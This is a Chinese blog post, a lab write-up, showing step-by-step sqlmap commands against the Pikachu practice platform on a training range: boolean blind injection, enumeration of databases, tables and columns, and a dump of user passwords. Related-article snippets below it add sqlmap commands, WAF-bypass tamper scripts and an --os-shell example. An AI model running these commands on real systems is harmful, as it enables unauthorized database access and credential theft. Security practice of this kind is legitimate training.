2021-11-09 sqlmap使用

最新推荐文章于 2023-08-27 22:20:32 发布
最新推荐文章于 2023-08-27 22:20:32 发布
阅读量2k 收藏 2
点赞数
分类专栏: SQL注入 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58489132/article/details/121238140
版权

本文章仅供学习和参考!

欢迎交流~

一、实验题目:sqlmap使用

        通过sqlmap对漏洞平台的盲注(base on boolean)进行实验

二、环境准备:

1. 漏洞练习平台:https://buuoj.cn/

2. kali虚拟机

三、实验过程:

1. 通过pikachu平台的盲注(base on boolian)进行实验:

 

2.  复制链接,进入kali进行sqlmap测试:

命令:sqlmap -u "http://3ecd3b68-144e-4b49-afda-9d2a2926ab17.node4.buuoj.cn:81/vul/sqli/sqli_blind_b.php?name=123&submit=查询"

结果如下:

 

 发现注入点,参数是name,后面是sqlmap使用的payload

3. 使用 --current-db语句查看当前的库名:

命令:sqlmap -u "http://3ecd3b68-144e-4b49-afda-9d2a2926ab17.node4.buuoj.cn:81/vul/sqli/sqli_blind_b.php?name=123&submit=查询"  --current-db

结果如下:

 当前数据库名为pikachu

4. 用-D指定数据库名,用--tables获取表名:

命令:sqlmap -u "http://3ecd3b68-144e-4b49-afda-9d2a2926ab17.node4.buuoj.cn:81/vul/sqli/sqli_blind_b.php?name=123&submit=查询"  -D pikachu --tables

结果如下:

5.  用-T指定表名,用--columns获取列名:

命令:sqlmap -u "http://3ecd3b68-144e-4b49-afda-9d2a2926ab17.node4.buuoj.cn:81/vul/sqli/sqli_blind_b.php?name=123&submit=查询"  -D pikachu -T users --columns

结果如下:

6.  用-C指定列名,用--dump获取表中的用户名和密码:

命令:sqlmap -u "http://3ecd3b68-144e-4b49-afda-9d2a2926ab17.node4.buuoj.cn:81/vul/sqli/sqli_blind_b.php?name=123&submit=查询"  -D pikachu -T users -C username,password --dump

结果如下:

获取到了3个用户的明文密码。

四、实验总结:

1.SQL注入原理:

        程序命令没能对用户输入的内容能作出正确的处理,导致执行非预期命令或访问数据,即接受的相关参数未经正确处理直接带入数据库进行查询操作。

2.SQL注入漏洞的产生满足两个条件:

(1)参数用户可控,即前段传给后端的参数内容是用户可以控制的

(2)参数带入数据库查询,即传入的参数拼接到SQL语句并带入数据库查询

夕阳的街道
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap全套使用教程
weixin_44717303的博客
05-26 1474
sqlmap全套使用教程实验环境sqlmap常见指令命令使用篇实战篇布尔盲注/时间盲注-r 实验环境 windows10+python3.9+sqlmap+sqli2 sqlmap常见指令 sqlmap常用参数: 目标:必须得有 -u : 指定目标URL,sql注入点 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=“COOKIE” HTTP Cookie的值 –random-agent 随机选择 HTTP User-Agent 头的值 –p
SqlMap2021-02-01
m0_52612972的博客
02-01 283
一、Sqlmap注入篇 1、检查注入点 root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 2、爆所有数据库信息 root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs 爆当前数据库信息 root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db 3、列出指定数据库所有的表名 root@kal
sqlmap基本入门--2021-12-30
stumiss的博客
12-30 291
https://zhuanlan.zhihu.com/p/367997403 https://blog.csdn.net/q20010619/article/details/122222636 sqlmap如何探测DVWA https://blog.csdn.net/fanxindong0620/article/details/102950329 https://blog.csdn.net/huilan_same/article/details/68067550
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程.docx
sqlmap使用
zhoufy的博客
08-19 267
一、sqlmap常用基础命令 sqlmap Common operation command 以下命令顺序即为sql注入常见步骤。 sqlmap -u [“url”] --dbs #获取数据库 sqlmap -u [“url”] --current-user #获取当前用户名称 : sqlmap -u [“url”] --current-db #获取当前数据库名称 sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 : sqlmap -u [“url”] -D...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
ibatis-sqlmap-2.3.0中sqlmap支持通配符
08-24
在Ibatis SqlMap 2.3.0中,它为开发者提供了这样的功能,允许在SQL语句中使用通配符来实现这种需求。 1. **通配符的种类**: - `%`:代表任意多个字符,包括零个字符。例如,在`LIKE 'abc%'`中,可以匹配到以"abc...
sqlmap-master
最新发布
01-04
标题"sqlmap-master"暗示了我们讨论的是SQLMap的某个版本或者分支,可能是其源代码仓库的主分支。 SQLMap的核心功能包括: 1. **自动检测**:它能够自动识别网站应用的数据库管理系统(如MySQL、Oracle、SQL ...
E109-数据库安全-使用sqlmap注入mysql数据库.pdf
12-02
在这个场景中,我们使用的工具是sqlmap,这是一个自动化SQL注入工具,能够帮助检测和利用SQL注入漏洞。 首先,我们需要启动实验环境,即虚拟机,并通过ipconfig命令获取靶机的IP地址。在这个例子中,靶机IP为172.16...
sqlmap-1.3.7-19.zip
07-12
在压缩包`sqlmapproject-sqlmap-c3a95e8`中,`sqlmap`目录很可能包含了源代码、可执行文件、文档和其他相关资源。对于安全专业人士来说,了解和掌握如何使用这个工具是至关重要的,因为它不仅可以用于测试自己的系统...
[BUUCTF]-N1BOOK-[第一章 web入门]SQL注入-1 及sqlmap的简单使用
yzl_007的博客
08-28 1493
[第一章 web入门]SQL注入-1 及sqlmap的简单使用 跟着题目来学习一下sqlmap的简单使用 首先?id=1是如下结果 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ked8spa3-1630160772569)(https://i.loli.net/2021/08/28/Oemn9syKg1lEcxS.png)] id=1’ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HsULWnzZ-1630160772571)(https
sqlmap的简单使用(sql注入)
yzl_007的博客
08-28 516
1、判断是否存在注入点2、查看所有数据库3、查看数据中的列表4、查看列表中的字段5、查看字段的内容6、然后还有一些其他的 1、判断是否存在注入点 python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 2、查看所有数据库 python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buu.
sqlmap的常用tamper脚本
浅笑996的博客
11-02 3065
sqlmap下的tamper目录存放绕过WAF脚本 使用方法 --tamper 脚本名称,脚本名称 多个tamper脚本之间用空格隔开 apostrophemask.py 用utf8代替引号 equaltolike.py like代替等号 space2dash.py 绕过过滤‘=...
sqlmap使用 (以封神台题目为例)
yangtailang94666的博客
10-11 1326
一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL --data=DATA 数据字符串通过POST发送 --cookie=COOKIE HTTP Cookie的值 ...
sqlmap练习
m0_58265086的博客
08-27 119
1.输入sqlmap打开软件2. 获取数据库cms中对应表3.获取cms中cms_users表下对应的列名4.获得管理员密码输入:sqlmap.py -u"http://10.9.75.31/cms/show.php?
Sqlmap常用命令总结及注入实战(Access、mysql)
上善若水~的博客
05-14 1053
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1.   sqlmap -u  “http://www.xx.com?id=x”    【查询是否存在注入点 –dbs         【检测站点包含哪些数据库 3.     --curre
sqlmap命令详解
Pitbull2014的博客
12-20 1128
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
SQL 获取列名
weixin_45827203的博客
06-17 3558
获得列名 select name from syscolumns where id=object_id('tb_user') 或 select col_name(object_id('table'),1) from sysobjects where name='table' --读取库中的所有表名 select name from sysobjects where xtype='Warehouse_management_system' --读取指定表的所有列名 select na
尤里的复仇II 回归
sparename的博客
09-09 872
尤里的复仇II 归来sqlmap尝鲜题sql-注入绕过防护getshell sqlmap尝鲜题 Tips: 在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松…… 很简单的啦,一跑就出来啦 传送门 sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --os-shell//控制目标服务器 sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=c
sqli-labs使用sqlmap通关
07-27
为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值